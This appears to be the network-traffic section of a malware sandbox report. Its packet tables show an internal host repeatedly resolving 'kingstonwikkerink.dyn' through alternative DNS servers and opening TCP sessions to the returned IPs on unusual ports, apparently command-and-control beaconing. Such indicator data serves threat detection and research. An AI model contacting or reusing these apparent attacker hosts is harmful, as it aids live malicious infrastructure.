                                                                            Oct 26, 2024 19:17:44.302409887 CEST627152898185.82.200.181192.168.2.13
                                                                            Oct 26, 2024 19:17:44.302490950 CEST528986271192.168.2.13185.82.200.181
                                                                            Oct 26, 2024 19:17:44.302539110 CEST528986271192.168.2.13185.82.200.181
                                                                            Oct 26, 2024 19:17:44.307914019 CEST627152898185.82.200.181192.168.2.13
                                                                            Oct 26, 2024 19:17:44.307966948 CEST528986271192.168.2.13185.82.200.181
                                                                            Oct 26, 2024 19:17:44.313513041 CEST627152898185.82.200.181192.168.2.13
                                                                            Oct 26, 2024 19:17:45.464508057 CEST627152898185.82.200.181192.168.2.13
                                                                            Oct 26, 2024 19:17:45.464705944 CEST528986271192.168.2.13185.82.200.181
                                                                            Oct 26, 2024 19:17:45.470046043 CEST627152898185.82.200.181192.168.2.13
                                                                            Oct 26, 2024 19:18:00.492732048 CEST370102515192.168.2.13193.233.193.45
                                                                            Oct 26, 2024 19:18:00.498145103 CEST251537010193.233.193.45192.168.2.13
                                                                            Oct 26, 2024 19:18:00.498281002 CEST370102515192.168.2.13193.233.193.45
                                                                            Oct 26, 2024 19:18:00.498322964 CEST370102515192.168.2.13193.233.193.45
                                                                            Oct 26, 2024 19:18:00.503760099 CEST251537010193.233.193.45192.168.2.13
                                                                            Oct 26, 2024 19:18:00.503868103 CEST370102515192.168.2.13193.233.193.45
                                                                            Oct 26, 2024 19:18:00.509229898 CEST251537010193.233.193.45192.168.2.13
                                                                            Oct 26, 2024 19:18:01.858881950 CEST251537010193.233.193.45192.168.2.13
                                                                            Oct 26, 2024 19:18:01.859133005 CEST370102515192.168.2.13193.233.193.45
                                                                            Oct 26, 2024 19:18:01.859338045 CEST370102515192.168.2.13193.233.193.45
                                                                            Oct 26, 2024 19:18:06.896599054 CEST547201414192.168.2.1391.149.218.232
                                                                            Oct 26, 2024 19:18:06.902086973 CEST14145472091.149.218.232192.168.2.13
                                                                            Oct 26, 2024 19:18:06.902237892 CEST547201414192.168.2.1391.149.218.232
                                                                            Oct 26, 2024 19:18:06.902267933 CEST547201414192.168.2.1391.149.218.232
                                                                            Oct 26, 2024 19:18:06.907582998 CEST14145472091.149.218.232192.168.2.13
                                                                            Oct 26, 2024 19:18:06.907726049 CEST547201414192.168.2.1391.149.218.232
                                                                            Oct 26, 2024 19:18:06.913201094 CEST14145472091.149.218.232192.168.2.13
                                                                            Oct 26, 2024 19:18:07.747374058 CEST14145472091.149.218.232192.168.2.13
                                                                            Oct 26, 2024 19:18:07.747385979 CEST14145472091.149.218.232192.168.2.13
                                                                            Oct 26, 2024 19:18:07.747602940 CEST547201414192.168.2.1391.149.218.232
                                                                            Oct 26, 2024 19:18:07.747602940 CEST547201414192.168.2.1391.149.218.232
                                                                            Oct 26, 2024 19:18:07.747703075 CEST547201414192.168.2.1391.149.218.232
                                                                            Oct 26, 2024 19:18:12.778263092 CEST4520623231192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:12.783827066 CEST232314520691.149.238.18192.168.2.13
                                                                            Oct 26, 2024 19:18:12.783920050 CEST4520623231192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:12.783986092 CEST4520623231192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:12.789483070 CEST232314520691.149.238.18192.168.2.13
                                                                            Oct 26, 2024 19:18:12.789613962 CEST4520623231192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:12.795219898 CEST232314520691.149.238.18192.168.2.13
                                                                            Oct 26, 2024 19:18:13.608937979 CEST232314520691.149.238.18192.168.2.13
                                                                            Oct 26, 2024 19:18:13.608999014 CEST232314520691.149.238.18192.168.2.13
                                                                            Oct 26, 2024 19:18:13.609110117 CEST4520623231192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:13.609111071 CEST4520623231192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:13.609172106 CEST4520623231192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:38.636482000 CEST4520823231192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:38.642128944 CEST232314520891.149.238.18192.168.2.13
                                                                            Oct 26, 2024 19:18:38.642239094 CEST4520823231192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:38.642271042 CEST4520823231192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:38.647782087 CEST232314520891.149.238.18192.168.2.13
                                                                            Oct 26, 2024 19:18:38.647841930 CEST4520823231192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:38.653207064 CEST232314520891.149.238.18192.168.2.13
                                                                            Oct 26, 2024 19:18:39.473293066 CEST232314520891.149.238.18192.168.2.13
                                                                            Oct 26, 2024 19:18:39.473520994 CEST4520823231192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:39.473520994 CEST4520823231192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:44.505194902 CEST5515410220192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:18:44.510670900 CEST102205515431.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:18:44.510772943 CEST5515410220192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:18:44.510819912 CEST5515410220192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:18:44.516280890 CEST102205515431.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:18:44.516350985 CEST5515410220192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:18:44.522397995 CEST102205515431.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:18:45.126701117 CEST102205515431.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:18:45.127104044 CEST5515410220192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:18:45.132466078 CEST102205515431.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:18:50.255748034 CEST445424242192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:18:50.262132883 CEST42424454231.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:18:50.262224913 CEST445424242192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:18:50.262249947 CEST445424242192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:18:50.267690897 CEST42424454231.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:18:50.267759085 CEST445424242192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:18:50.273355007 CEST42424454231.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:18:50.911016941 CEST42424454231.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:18:50.911458969 CEST445424242192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:18:50.917196035 CEST42424454231.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:18:56.005004883 CEST397729456192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:56.010664940 CEST94563977291.149.238.18192.168.2.13
                                                                            Oct 26, 2024 19:18:56.010782957 CEST397729456192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:56.010821104 CEST397729456192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:56.016175985 CEST94563977291.149.238.18192.168.2.13
                                                                            Oct 26, 2024 19:18:56.016259909 CEST397729456192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:56.021704912 CEST94563977291.149.238.18192.168.2.13
                                                                            Oct 26, 2024 19:18:56.854207993 CEST94563977291.149.238.18192.168.2.13
                                                                            Oct 26, 2024 19:18:56.854413033 CEST397729456192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:18:56.854506969 CEST397729456192.168.2.1391.149.238.18
                                                                            Oct 26, 2024 19:19:01.886718035 CEST5706421676192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:19:01.892051935 CEST216765706486.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:19:01.892129898 CEST5706421676192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:19:01.892180920 CEST5706421676192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:19:01.897459984 CEST216765706486.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:19:01.897509098 CEST5706421676192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:19:01.902776003 CEST216765706486.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:19:03.257586002 CEST216765706486.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:19:03.257611036 CEST216765706486.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:19:03.257709026 CEST216765706486.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:19:03.257781029 CEST5706421676192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:19:03.257781029 CEST5706421676192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:19:03.257829905 CEST5706421676192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:19:03.257846117 CEST5706421676192.168.2.1386.107.100.80
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 26, 2024 19:16:58.150033951 CEST5634053192.168.2.1351.158.108.203
                                                                            Oct 26, 2024 19:16:58.166598082 CEST535634051.158.108.203192.168.2.13
                                                                            Oct 26, 2024 19:16:58.292217970 CEST6014353192.168.2.1351.158.108.203
                                                                            Oct 26, 2024 19:16:58.308862925 CEST536014351.158.108.203192.168.2.13
                                                                            Oct 26, 2024 19:17:00.199693918 CEST4089653192.168.2.131.1.1.1
                                                                            Oct 26, 2024 19:17:00.199693918 CEST5726753192.168.2.131.1.1.1
                                                                            Oct 26, 2024 19:17:00.207149029 CEST53572671.1.1.1192.168.2.13
                                                                            Oct 26, 2024 19:17:00.207806110 CEST53408961.1.1.1192.168.2.13
                                                                            Oct 26, 2024 19:17:04.548800945 CEST4273553192.168.2.13137.220.52.23
                                                                            Oct 26, 2024 19:17:09.552288055 CEST4333953192.168.2.13152.53.15.127
                                                                            Oct 26, 2024 19:17:09.563755989 CEST5343339152.53.15.127192.168.2.13
                                                                            Oct 26, 2024 19:17:15.204343081 CEST4164353192.168.2.1380.152.203.134
                                                                            Oct 26, 2024 19:17:15.284214020 CEST534164380.152.203.134192.168.2.13
                                                                            Oct 26, 2024 19:17:21.183985949 CEST5230253192.168.2.13185.181.61.24
                                                                            Oct 26, 2024 19:17:21.217669010 CEST5352302185.181.61.24192.168.2.13
                                                                            Oct 26, 2024 19:17:26.852370024 CEST3621853192.168.2.1380.152.203.134
                                                                            Oct 26, 2024 19:17:26.914787054 CEST533621880.152.203.134192.168.2.13
                                                                            Oct 26, 2024 19:17:32.849006891 CEST4381753192.168.2.1381.169.136.222
                                                                            Oct 26, 2024 19:17:32.877866983 CEST534381781.169.136.222192.168.2.13
                                                                            Oct 26, 2024 19:17:39.261270046 CEST4925053192.168.2.1370.34.254.19
                                                                            Oct 26, 2024 19:17:44.268318892 CEST5092153192.168.2.13217.160.70.42
                                                                            Oct 26, 2024 19:17:44.295861959 CEST5350921217.160.70.42192.168.2.13
                                                                            Oct 26, 2024 19:17:50.467842102 CEST4232353192.168.2.1370.34.254.19
                                                                            Oct 26, 2024 19:17:55.474976063 CEST3612653192.168.2.135.161.109.23
                                                                            Oct 26, 2024 19:18:00.481061935 CEST3329453192.168.2.13202.61.197.122
                                                                            Oct 26, 2024 19:18:00.492328882 CEST5333294202.61.197.122192.168.2.13
                                                                            Oct 26, 2024 19:18:06.861794949 CEST5306053192.168.2.13185.181.61.24
                                                                            Oct 26, 2024 19:18:06.895849943 CEST5353060185.181.61.24192.168.2.13
                                                                            Oct 26, 2024 19:18:12.750184059 CEST3352653192.168.2.1365.21.1.106
                                                                            Oct 26, 2024 19:18:12.777451038 CEST533352665.21.1.106192.168.2.13
                                                                            Oct 26, 2024 19:18:18.612476110 CEST5401253192.168.2.1370.34.254.19
                                                                            Oct 26, 2024 19:18:23.619520903 CEST5324353192.168.2.1364.176.6.48
                                                                            Oct 26, 2024 19:18:28.624051094 CEST4263253192.168.2.13178.254.22.166
                                                                            Oct 26, 2024 19:18:33.630310059 CEST5258153192.168.2.13139.84.165.176
                                                                            Oct 26, 2024 19:18:44.476217031 CEST3608553192.168.2.13217.160.70.42
                                                                            Oct 26, 2024 19:18:44.504378080 CEST5336085217.160.70.42192.168.2.13
                                                                            Oct 26, 2024 19:18:50.129755974 CEST3866053192.168.2.1380.152.203.134
                                                                            Oct 26, 2024 19:18:50.254956961 CEST533866080.152.203.134192.168.2.13
                                                                            Oct 26, 2024 19:18:55.915354013 CEST5665253192.168.2.13168.235.111.72
                                                                            Oct 26, 2024 19:18:56.003783941 CEST5356652168.235.111.72192.168.2.13
                                                                            Oct 26, 2024 19:19:01.857541084 CEST4265953192.168.2.13217.160.70.42
                                                                            Oct 26, 2024 19:19:01.885994911 CEST5342659217.160.70.42192.168.2.13
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Oct 26, 2024 19:16:58.150033951 CEST192.168.2.1351.158.108.2030x99b4Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:00.199693918 CEST192.168.2.131.1.1.10x1ce0Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:00.199693918 CEST192.168.2.131.1.1.10x4bb5Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                                            Oct 26, 2024 19:17:04.548800945 CEST192.168.2.13137.220.52.230xf8c2Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:09.552288055 CEST192.168.2.13152.53.15.1270x2b54Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:15.204343081 CEST192.168.2.1380.152.203.1340x4cc8Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:21.183985949 CEST192.168.2.13185.181.61.240xb5a8Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:26.852370024 CEST192.168.2.1380.152.203.1340x16bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:32.849006891 CEST192.168.2.1381.169.136.2220x2748Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:39.261270046 CEST192.168.2.1370.34.254.190x17cfStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:44.268318892 CEST192.168.2.13217.160.70.420x6b13Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:50.467842102 CEST192.168.2.1370.34.254.190xaf5aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:55.474976063 CEST192.168.2.135.161.109.230x12a4Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:00.481061935 CEST192.168.2.13202.61.197.1220x8eccStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:06.861794949 CEST192.168.2.13185.181.61.240xb026Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:12.750184059 CEST192.168.2.1365.21.1.1060xdb27Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:18.612476110 CEST192.168.2.1370.34.254.190x1218Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:23.619520903 CEST192.168.2.1364.176.6.480x303cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:28.624051094 CEST192.168.2.13178.254.22.1660x6e10Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:33.630310059 CEST192.168.2.13139.84.165.1760x890aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:44.476217031 CEST192.168.2.13217.160.70.420x5681Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:50.129755974 CEST192.168.2.1380.152.203.1340xb781Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:55.915354013 CEST192.168.2.13168.235.111.720xeeddStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:19:01.857541084 CEST192.168.2.13217.160.70.420x1feaStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Oct 26, 2024 19:16:58.166598082 CEST51.158.108.203192.168.2.130x99b4No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:16:58.166598082 CEST51.158.108.203192.168.2.130x99b4No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:16:58.166598082 CEST51.158.108.203192.168.2.130x99b4No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:16:58.166598082 CEST51.158.108.203192.168.2.130x99b4No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:16:58.166598082 CEST51.158.108.203192.168.2.130x99b4No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:16:58.166598082 CEST51.158.108.203192.168.2.130x99b4No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:16:58.166598082 CEST51.158.108.203192.168.2.130x99b4No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:16:58.166598082 CEST51.158.108.203192.168.2.130x99b4No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:16:58.166598082 CEST51.158.108.203192.168.2.130x99b4No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:16:58.166598082 CEST51.158.108.203192.168.2.130x99b4No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:16:58.166598082 CEST51.158.108.203192.168.2.130x99b4No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:00.207806110 CEST1.1.1.1192.168.2.130x1ce0No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:00.207806110 CEST1.1.1.1192.168.2.130x1ce0No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:09.563755989 CEST152.53.15.127192.168.2.130x2b54No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:09.563755989 CEST152.53.15.127192.168.2.130x2b54No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:09.563755989 CEST152.53.15.127192.168.2.130x2b54No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:09.563755989 CEST152.53.15.127192.168.2.130x2b54No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:09.563755989 CEST152.53.15.127192.168.2.130x2b54No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:09.563755989 CEST152.53.15.127192.168.2.130x2b54No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:09.563755989 CEST152.53.15.127192.168.2.130x2b54No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:09.563755989 CEST152.53.15.127192.168.2.130x2b54No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:09.563755989 CEST152.53.15.127192.168.2.130x2b54No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:09.563755989 CEST152.53.15.127192.168.2.130x2b54No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:09.563755989 CEST152.53.15.127192.168.2.130x2b54No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:15.284214020 CEST80.152.203.134192.168.2.130x4cc8No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:15.284214020 CEST80.152.203.134192.168.2.130x4cc8No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:15.284214020 CEST80.152.203.134192.168.2.130x4cc8No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:15.284214020 CEST80.152.203.134192.168.2.130x4cc8No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:15.284214020 CEST80.152.203.134192.168.2.130x4cc8No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:15.284214020 CEST80.152.203.134192.168.2.130x4cc8No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:15.284214020 CEST80.152.203.134192.168.2.130x4cc8No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:15.284214020 CEST80.152.203.134192.168.2.130x4cc8No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:15.284214020 CEST80.152.203.134192.168.2.130x4cc8No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:15.284214020 CEST80.152.203.134192.168.2.130x4cc8No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:15.284214020 CEST80.152.203.134192.168.2.130x4cc8No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:21.217669010 CEST185.181.61.24192.168.2.130xb5a8No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:21.217669010 CEST185.181.61.24192.168.2.130xb5a8No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:21.217669010 CEST185.181.61.24192.168.2.130xb5a8No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:21.217669010 CEST185.181.61.24192.168.2.130xb5a8No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:21.217669010 CEST185.181.61.24192.168.2.130xb5a8No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:21.217669010 CEST185.181.61.24192.168.2.130xb5a8No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:21.217669010 CEST185.181.61.24192.168.2.130xb5a8No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:21.217669010 CEST185.181.61.24192.168.2.130xb5a8No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:21.217669010 CEST185.181.61.24192.168.2.130xb5a8No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:21.217669010 CEST185.181.61.24192.168.2.130xb5a8No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:21.217669010 CEST185.181.61.24192.168.2.130xb5a8No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:26.914787054 CEST80.152.203.134192.168.2.130x16bNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:26.914787054 CEST80.152.203.134192.168.2.130x16bNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:26.914787054 CEST80.152.203.134192.168.2.130x16bNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:26.914787054 CEST80.152.203.134192.168.2.130x16bNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:26.914787054 CEST80.152.203.134192.168.2.130x16bNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:26.914787054 CEST80.152.203.134192.168.2.130x16bNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:26.914787054 CEST80.152.203.134192.168.2.130x16bNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:26.914787054 CEST80.152.203.134192.168.2.130x16bNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:26.914787054 CEST80.152.203.134192.168.2.130x16bNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:26.914787054 CEST80.152.203.134192.168.2.130x16bNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:26.914787054 CEST80.152.203.134192.168.2.130x16bNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:32.877866983 CEST81.169.136.222192.168.2.130x2748No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:32.877866983 CEST81.169.136.222192.168.2.130x2748No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:32.877866983 CEST81.169.136.222192.168.2.130x2748No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:32.877866983 CEST81.169.136.222192.168.2.130x2748No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:32.877866983 CEST81.169.136.222192.168.2.130x2748No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:32.877866983 CEST81.169.136.222192.168.2.130x2748No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:32.877866983 CEST81.169.136.222192.168.2.130x2748No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:32.877866983 CEST81.169.136.222192.168.2.130x2748No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:32.877866983 CEST81.169.136.222192.168.2.130x2748No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:32.877866983 CEST81.169.136.222192.168.2.130x2748No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:32.877866983 CEST81.169.136.222192.168.2.130x2748No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:44.295861959 CEST217.160.70.42192.168.2.130x6b13No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:44.295861959 CEST217.160.70.42192.168.2.130x6b13No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:44.295861959 CEST217.160.70.42192.168.2.130x6b13No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:44.295861959 CEST217.160.70.42192.168.2.130x6b13No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:44.295861959 CEST217.160.70.42192.168.2.130x6b13No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:44.295861959 CEST217.160.70.42192.168.2.130x6b13No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
